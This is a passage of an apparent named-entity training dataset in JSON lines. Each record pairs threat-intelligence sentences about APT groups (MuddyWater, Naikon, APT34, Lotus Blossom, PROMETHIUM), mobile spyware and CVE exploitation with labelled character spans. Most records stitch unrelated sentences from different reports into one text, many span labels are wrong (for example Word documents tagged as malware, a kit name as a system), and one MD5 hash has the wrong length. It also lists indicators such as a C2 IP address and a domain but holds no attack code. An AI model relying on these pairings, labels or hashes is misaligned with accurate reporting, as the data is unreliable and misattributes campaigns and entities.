and brand was sold from Connexxa S.R.L . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . 
We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 66, "end": 82, "label": "Organization"}, {"start": 112, "end": 120, "label": "Vulnerability"}, {"start": 151, "end": 172, "label": "Organization"}, {"start": 299, "end": 310, "label": "Organization"}, {"start": 325, "end": 343, "label": "Organization"}, {"start": 348, "end": 359, "label": "Organization"}, {"start": 363, "end": 373, "label": "Organization"}, {"start": 392, "end": 397, "label": "Organization"}]} {"text": "to eSurv S.R.L . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": [{"start": 3, "end": 16, "label": "Organization"}, {"start": 81, "end": 105, "label": "Malware"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 163, "end": 174, "label": "Organization"}, {"start": 189, "end": 207, "label": "Organization"}, {"start": 212, "end": 223, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}]} {"text": "on Feb 28 , 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . 
Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise .", "spans": [{"start": 19, "end": 27, "label": "Organization"}, {"start": 49, "end": 76, "label": "Vulnerability"}, {"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 138, "end": 152, "label": "Malware"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 175, "end": 191, "label": "System"}, {"start": 194, "end": 207, "label": "Vulnerability"}, {"start": 272, "end": 300, "label": "Organization"}, {"start": 304, "end": 324, "label": "Organization"}, {"start": 351, "end": 366, "label": "Organization"}]} {"text": "Lookout notified Google of the potential threat shortly after it was discovered . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . The group mainly targets the telecommunications and IT services sectors .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 23, "label": "Organization"}, {"start": 229, "end": 242, "label": "Vulnerability"}, {"start": 245, "end": 258, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 333, "end": 352, "label": "Organization"}]} {"text": "Together , during the latter half of 2018 , we worked to remove the apps from the Play store while it was being deployed in the wild . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . 
However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US .", "spans": [{"start": 82, "end": 92, "label": "System"}, {"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}]} {"text": "iOS development Analysis of these Android samples led to the discovery of infrastructure that contained several samples of an iOS port . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 34, "end": 41, "label": "System"}, {"start": 126, "end": 129, "label": "System"}, {"start": 137, "end": 146, "label": "Malware"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 287, "end": 299, "label": "Organization"}]} {"text": "So far , this software ( along with the Android version ) has been made available through phishing sites that imitated Italian and Turkmenistani mobile carriers . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros .", "spans": [{"start": 40, "end": 47, "label": "System"}, {"start": 163, "end": 171, "label": "System"}, {"start": 181, "end": 192, "label": "Vulnerability"}, {"start": 214, "end": 217, "label": "System"}, {"start": 322, "end": 332, "label": "Organization"}, {"start": 341, "end": 359, "label": "Organization"}]} {"text": "Wind Tre SpA - an Italian telecom operator TMCell - the state owned mobile operator in Turkmenistan Deployment to users outside Apple \u2019 s app store was made possible through abuse of Apple \u2019 s enterprise provisioning system . 
WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 226, "end": 234, "label": "System"}, {"start": 270, "end": 281, "label": "Vulnerability"}, {"start": 311, "end": 325, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}]} {"text": "The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary , in-house apps to their employees without needing to use the iOS App Store . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors .", "spans": [{"start": 4, "end": 30, "label": "Organization"}, {"start": 162, "end": 165, "label": "System"}, {"start": 166, "end": 175, "label": "System"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 202, "end": 223, "label": "Vulnerability"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 314, "end": 324, "label": "Malware"}, {"start": 395, "end": 401, "label": "Organization"}]} {"text": "A business can obtain access to this program only provided they meet requirements set out by Apple . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . 
In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater .", "spans": [{"start": 93, "end": 98, "label": "Organization"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 180, "end": 194, "label": "Organization"}, {"start": 195, "end": 207, "label": "Organization"}, {"start": 235, "end": 246, "label": "Organization"}, {"start": 323, "end": 333, "label": "Organization"}]} {"text": "It is not common to use this program to distribute malware , although there have been past cases where malware authors have done so . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 141, "end": 162, "label": "System"}, {"start": 189, "end": 197, "label": "System"}, {"start": 242, "end": 267, "label": "Vulnerability"}, {"start": 284, "end": 295, "label": "Organization"}, {"start": 329, "end": 348, "label": "Malware"}]} {"text": "Each of the phishing sites contained links to a distribution manifest , which contained metadata such as the application name , version , icon , and a URL for the IPA file . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . 
In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 298, "end": 317, "label": "Vulnerability"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 402, "end": 421, "label": "Malware"}]} {"text": "To be distributed outside the app store , an IPA package must contain a mobile provisioning profile with an enterprise \u2019 s certificate . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature .", "spans": [{"start": 141, "end": 160, "label": "Vulnerability"}, {"start": 274, "end": 279, "label": "System"}, {"start": 282, "end": 290, "label": "System"}, {"start": 352, "end": 370, "label": "Organization"}, {"start": 399, "end": 409, "label": "Organization"}]} {"text": "All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. 
.", "spans": [{"start": 105, "end": 121, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 150, "end": 161, "label": "Vulnerability"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 324, "end": 341, "label": "Organization"}, {"start": 344, "end": 361, "label": "Organization"}, {"start": 375, "end": 399, "label": "Organization"}]} {"text": "Certificate Used The apps themselves pretended to be carrier assistance apps which instructed the user to \u201c keep the app installed on your device and stay under Wi-Fi coverage to be contacted by one of our operators \u201d . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere .", "spans": [{"start": 220, "end": 228, "label": "Organization"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 281, "end": 305, "label": "Vulnerability"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 374, "end": 382, "label": "Organization"}]} {"text": "One of the packages after initial launch The iOS variant is not as sophisticated as the Android version , and contained a subset of the functionality the Android releases offered . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . 
The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques .", "spans": [{"start": 45, "end": 48, "label": "System"}, {"start": 88, "end": 95, "label": "System"}, {"start": 154, "end": 161, "label": "System"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 300, "end": 317, "label": "Organization"}]} {"text": "In particular , these packages have not been observed to contain or to download exploits which would be required to perform certain types of activities on iOS devices . Some of the documents exploited CVE-2017-0199 to deliver the payload . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater .", "spans": [{"start": 155, "end": 158, "label": "System"}, {"start": 181, "end": 190, "label": "Malware"}, {"start": 201, "end": 214, "label": "Vulnerability"}, {"start": 218, "end": 237, "label": "Malware"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 387, "end": 410, "label": "Organization"}]} {"text": "Even without capabilities to exploit a device , the packages were able to exfiltrate the following types of data using documented APIs : Contacts Audio recordings Photos Videos GPS location Device information In addition , the packages offered a feature to perform remote audio recording . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . 
In this latest activity , BlackWater first added an obfuscated Visual Basic for Applications ( VBA ) script to establish persistence as a registry key .", "spans": [{"start": 177, "end": 180, "label": "System"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 349, "end": 362, "label": "Vulnerability"}, {"start": 461, "end": 490, "label": "System"}, {"start": 493, "end": 496, "label": "System"}]} {"text": "Though different versions of the app vary in structure , malicious code was initialized at application launch without the user \u2019 s knowledge , and a number of timers were setup to gather and upload data periodically . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater .", "spans": [{"start": 232, "end": 251, "label": "Organization"}, {"start": 278, "end": 297, "label": "Vulnerability"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 467, "end": 490, "label": "Organization"}]} {"text": "Upload data was queued and transmitted via HTTP PUT requests to an endpoint on the C2 . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . 
MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East .", "spans": [{"start": 43, "end": 47, "label": "Indicator"}, {"start": 92, "end": 97, "label": "Organization"}, {"start": 129, "end": 141, "label": "Vulnerability"}, {"start": 144, "end": 171, "label": "Vulnerability"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 263, "end": 276, "label": "System"}, {"start": 285, "end": 295, "label": "Organization"}]} {"text": "The iOS apps leverage the same C2 infrastructure as the Android version and use similar communications protocols . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 56, "end": 63, "label": "System"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 182, "end": 195, "label": "Vulnerability"}, {"start": 219, "end": 232, "label": "Organization"}, {"start": 340, "end": 369, "label": "Malware"}, {"start": 454, "end": 473, "label": "Malware"}, {"start": 527, "end": 529, "label": "Indicator"}, {"start": 545, "end": 550, "label": "Organization"}, {"start": 576, "end": 578, "label": "System"}]} {"text": "Push notifications were also used to control audio recording . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . 
Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations .", "spans": [{"start": 302, "end": 316, "label": "Vulnerability"}]} {"text": "Lookout has shared information about this family with Apple , and they have revoked the affected certificates . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 144, "end": 157, "label": "Vulnerability"}, {"start": 256, "end": 264, "label": "System"}, {"start": 367, "end": 377, "label": "Organization"}, {"start": 503, "end": 513, "label": "Organization"}]} {"text": "As a result , no new instances of this app can be installed on iOS devices and existing installations can no longer be run . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" .", "spans": [{"start": 63, "end": 66, "label": "System"}, {"start": 146, "end": 170, "label": "Malware"}, {"start": 199, "end": 263, "label": "Vulnerability"}, {"start": 275, "end": 288, "label": "Vulnerability"}, {"start": 335, "end": 347, "label": "Organization"}, {"start": 354, "end": 373, "label": "Malware"}, {"start": 410, "end": 420, "label": "Organization"}]} {"text": "Lookout customers are also protected from this threat on both Android and iOS . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 62, "end": 69, "label": "System"}, {"start": 74, "end": 77, "label": "System"}, {"start": 80, "end": 93, "label": "Organization"}, {"start": 115, "end": 128, "label": "Vulnerability"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 228, "label": "Vulnerability"}, {"start": 229, "end": 236, "label": "Vulnerability"}]} {"text": "Android Trojan Found in Targeted Attack 26 MAR 2013 In the past , we \u2019 ve seen targeted attacks against Tibetan and Uyghur activists on Windows and Mac OS X platforms . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . 
Considering the volume of Naikon activity observed and its relentless , repeated attack attempts , such a confrontation was worth looking into , so we did .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 136, "end": 143, "label": "System"}, {"start": 148, "end": 156, "label": "System"}, {"start": 169, "end": 182, "label": "Organization"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 255, "end": 270, "label": "System"}]} {"text": "We \u2019 ve documented several interesting attacks ( A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify ) which used ZIP files as well as DOC , XLS and PDF documents rigged with exploits . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China .", "spans": [{"start": 114, "end": 122, "label": "System"}, {"start": 224, "end": 232, "label": "System"}, {"start": 265, "end": 273, "label": "Malware"}, {"start": 289, "end": 302, "label": "Vulnerability"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 381, "end": 400, "label": "Organization"}, {"start": 405, "end": 437, "label": "Organization"}]} {"text": "Several days ago , the e-mail account of a high-profile Tibetan activist was hacked and used to send targeted attacks to other activists and human rights advocates . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . 
The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia .", "spans": [{"start": 185, "end": 190, "label": "Organization"}, {"start": 205, "end": 235, "label": "Vulnerability"}, {"start": 236, "end": 250, "label": "Vulnerability"}, {"start": 261, "end": 269, "label": "System"}, {"start": 274, "end": 285, "label": "System"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 340, "end": 351, "label": "Organization"}, {"start": 401, "end": 420, "label": "Malware"}, {"start": 444, "end": 450, "label": "Organization"}, {"start": 546, "end": 562, "label": "Organization"}]} {"text": "Perhaps the most interesting part is that the attack e-mails had an APK attachment \u2013 a malicious program for Android . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 .", "spans": [{"start": 109, "end": 116, "label": "System"}, {"start": 119, "end": 123, "label": "System"}, {"start": 197, "end": 212, "label": "Organization"}, {"start": 215, "end": 234, "label": "Organization"}, {"start": 237, "end": 256, "label": "Organization"}, {"start": 327, "end": 336, "label": "Organization"}, {"start": 344, "end": 366, "label": "Vulnerability"}, {"start": 385, "end": 389, "label": "System"}, {"start": 405, "end": 411, "label": "Organization"}, {"start": 484, "end": 490, "label": "Organization"}]} {"text": "The attack On March 24th , 2013 , the e-mail account of a high-profile Tibetan activist was hacked and used to send spear phishing e-mails to their contact list . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal .", "spans": [{"start": 179, "end": 183, "label": "System"}, {"start": 205, "end": 221, "label": "Vulnerability"}, {"start": 382, "end": 391, "label": "Organization"}, {"start": 454, "end": 473, "label": "Organization"}, {"start": 478, "end": 510, "label": "Organization"}]} {"text": "This is what the spear phishing e-mail looked like : In regards to the message text above , multiple activist groups have recently organized a human rights conference event in Geneva . 
It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": [{"start": 212, "end": 225, "label": "System"}, {"start": 228, "end": 241, "label": "Vulnerability"}, {"start": 347, "end": 360, "label": "Indicator"}, {"start": 410, "end": 414, "label": "System"}, {"start": 444, "end": 457, "label": "Vulnerability"}, {"start": 458, "end": 465, "label": "Vulnerability"}]} {"text": "We \u2019 ve noticed an increase in the number of attacks using this event as a lure . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine .", "spans": [{"start": 87, "end": 100, "label": "Malware"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 380, "end": 390, "label": "Malware"}]} {"text": "Here \u2019 s another example of such an attack hitting Windows users : Going back to the Android Package ( APK ) file was attached to the e-mail , this is pushing an Android application named \u201c WUC \u2019 s Conference.apk \u201d . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . 
It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": [{"start": 51, "end": 58, "label": "System"}, {"start": 85, "end": 100, "label": "System"}, {"start": 190, "end": 212, "label": "Malware"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 267, "end": 280, "label": "Vulnerability"}, {"start": 431, "end": 440, "label": "Organization"}, {"start": 448, "end": 462, "label": "Malware"}]} {"text": "This malicious APK is 334326 bytes file , MD5 : 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as \u201c Backdoor.AndroidOS.Chuli.a \u201d . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . In addition to stealing keystrokes , Naikon also intercepted network traffic .", "spans": [{"start": 48, "end": 80, "label": "Indicator"}, {"start": 100, "end": 113, "label": "Organization"}, {"start": 128, "end": 154, "label": "Indicator"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 196, "end": 212, "label": "Vulnerability"}, {"start": 303, "end": 309, "label": "Organization"}]} {"text": "After the installation , an application named \u201c Conference \u201d appears on the desktop : If the victim launches this app , he will see text which \u201c enlightens \u201d the information about the upcoming event : The full text reads follows . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . 
Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work .", "spans": [{"start": 231, "end": 240, "label": "Organization"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 298, "end": 308, "label": "Organization"}]} {"text": "Notice notice the use of the mistaken \u201c Word \u201d instead of \u201c World \u201d : \u201c On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT .", "spans": [{"start": 96, "end": 124, "label": "Organization"}, {"start": 131, "end": 186, "label": "Organization"}, {"start": 195, "end": 233, "label": "Organization"}, {"start": 543, "end": 558, "label": "Organization"}, {"start": 561, "end": 571, "label": "Organization"}, {"start": 576, "end": 585, "label": "Organization"}, {"start": 644, "end": 659, "label": "Vulnerability"}, {"start": 794, "end": 804, "label": "Organization"}]} {"text": "by the great enthusiasm , contribution and desire from all in attendance to make this occasion something meaningful , the outcome of which produced some concrete , action-orientated solutions to our shared grievances . 
The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" .", "spans": [{"start": 238, "end": 250, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 292, "end": 301, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 335, "end": 376, "label": "Vulnerability"}, {"start": 379, "end": 392, "label": "Vulnerability"}, {"start": 439, "end": 445, "label": "System"}, {"start": 542, "end": 554, "label": "Organization"}, {"start": 579, "end": 584, "label": "Organization"}, {"start": 599, "end": 607, "label": "Organization"}]} {"text": "We are especially delighted about the platform and programme of work established in the declaration of the conference , upon which we sincerely hope will be built a strong and resolute working relationship on our shared goals for the future . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" .", "spans": [{"start": 260, "end": 269, "label": "Organization"}, {"start": 295, "end": 311, "label": "Vulnerability"}, {"start": 320, "end": 330, "label": "Organization"}, {"start": 439, "end": 445, "label": "Organization"}, {"start": 450, "end": 458, "label": "Organization"}, {"start": 514, "end": 526, "label": "Organization"}, {"start": 533, "end": 552, "label": "Malware"}]} {"text": "With this in mind , we thoroughly look forward to working with you on these matters . 
Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk .", "spans": [{"start": 109, "end": 118, "label": "Organization"}, {"start": 138, "end": 152, "label": "Vulnerability"}, {"start": 173, "end": 180, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 227, "end": 257, "label": "Vulnerability"}, {"start": 270, "end": 293, "label": "Organization"}, {"start": 315, "end": 323, "label": "Malware"}, {"start": 421, "end": 439, "label": "Organization"}, {"start": 452, "end": 460, "label": "Organization"}, {"start": 463, "end": 472, "label": "Organization"}, {"start": 475, "end": 481, "label": "Organization"}, {"start": 487, "end": 494, "label": "Organization"}]} {"text": "Dolkun lsa Chairman of the Executive Committee Word Uyghur Congress \u201d While the victim reads this fake message , the malware secretly reports the infection to a command-and-control server . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . PROMETHIUM is an activity group that has been active as early as 2012 .", "spans": [{"start": 27, "end": 67, "label": "Organization"}, {"start": 233, "end": 242, "label": "Malware"}, {"start": 258, "end": 271, "label": "Vulnerability"}, {"start": 274, "end": 284, "label": "Organization"}]} {"text": "After that , it begins to harvest information stored on the device . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . 
The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years .", "spans": [{"start": 95, "end": 100, "label": "Organization"}, {"start": 122, "end": 152, "label": "Vulnerability"}, {"start": 153, "end": 167, "label": "Vulnerability"}, {"start": 178, "end": 186, "label": "System"}, {"start": 191, "end": 202, "label": "System"}, {"start": 230, "end": 238, "label": "Malware"}]} {"text": "The stolen data includes : Contacts ( stored both on the phone and the SIM card ) . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird .", "spans": [{"start": 113, "end": 118, "label": "Organization"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 227, "end": 241, "label": "Vulnerability"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 372, "end": 381, "label": "Organization"}, {"start": 385, "end": 393, "label": "Malware"}]} {"text": "Call logs . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . 
PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 51, "end": 81, "label": "Vulnerability"}, {"start": 82, "end": 96, "label": "Vulnerability"}, {"start": 107, "end": 115, "label": "System"}, {"start": 120, "end": 131, "label": "System"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 182, "end": 192, "label": "Organization"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 220, "end": 227, "label": "Vulnerability"}, {"start": 232, "end": 245, "label": "Vulnerability"}, {"start": 273, "end": 278, "label": "System"}]} {"text": "SMS messages . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks .", "spans": [{"start": 15, "end": 23, "label": "System"}, {"start": 46, "end": 59, "label": "System"}, {"start": 80, "end": 93, "label": "Vulnerability"}]} {"text": "Geo-location . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": [{"start": 102, "end": 159, "label": "Vulnerability"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 260, "end": 270, "label": "Organization"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 329, "end": 349, "label": "Organization"}]} {"text": "Phone data ( phone number , OS version , phone model , SDK version ) . 
